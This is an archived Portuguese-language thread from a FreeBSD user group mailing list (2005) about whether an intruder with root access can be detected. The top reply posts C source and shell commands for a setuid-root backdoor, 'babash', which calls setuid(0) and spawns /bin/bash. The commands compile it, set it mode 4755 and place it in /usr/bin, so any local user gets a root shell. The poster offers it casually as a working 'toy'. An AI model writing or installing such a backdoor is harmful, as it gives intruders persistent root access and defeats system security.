Oi pessoal,

Tentem isso:

vi babash.c
#include <stdlib.h>
        main () {
                setuid(0);
                system("/bin/bash");
        }

/usr/local/bin/gcc babash.c -o babash
chmod 4755 babash
mv babash /usr/bin/babash

N�o me lembro quem escreveu esse brinquedo. N�o fui eu pois meu conhecimento
em C � pobre...

Tem rodado em maquinas solaris 8, 9  e Linux...
Ainda n�o rodei no BSD ...

Abra�o



-----Mensagem original-----
De: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Em nome
de Celso Viana
Enviada em: sexta-feira, 8 de abril de 2005 10:12
Para: Lista de discussao do grupo FUG-BR
Assunto: Re: [FUG-BR] seguran�a

sim...... uso secure level 2

o cen�rio seria esse: tendo acabado de instalar o OS, instalei um
software que tem uma falha de seguran�a e eu n�o sei disso;
essa m�quina est� vis�vel para o mundo (ip real); 
essa m�quina ainda n�o foi atualizada; 
o OS est� em secure level 2;

minha d�vida: imaginemos que algu�m, nesse momento, descobriu essa
m�quina e resolva explorar essa vulnerabilidade e tenha ganhado acesso
root; eu, estando logado no console, posso identificar esse invasor?
ele est� vis�vel para os comandos do sistema? � poss�vel fazer com que
o sistema emita um alarme qdo esse invasor consiga o acesso?

Celso


Celso

On Apr 8, 2005 9:59 AM, Christopher Giese - IRAPIDA
<[EMAIL PROTECTED]> wrote:
> depende
> 
> vc usa secure level kernel ????
> 
> pq se nao usa ele pode colocar um rootkit facilmente em sue sistema :)
> 
> 
> Celso Viana wrote:
> 
> >all,
> >
> >Se algu�m consegue explorar uma vulnerabilidade num sistema FreeBSD,
> >ganhando acesso root, esse algu�m fica totalmente invis�vel? ou os
> >comandos "w, who, etc" identificam o invasor?
> >
> >Celso
> >
> >_______________________________________________
> >Freebsd mailing list
> >[email protected]
> >http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
> >
> >
> 
> _______________________________________________
> Freebsd mailing list
> [email protected]
> http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br
>

_______________________________________________
Freebsd mailing list
[email protected]
http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br

_______________________________________________
Freebsd mailing list
[email protected]
http://mail.fug.com.br/mailman/listinfo/freebsd_fug.com.br

Responder a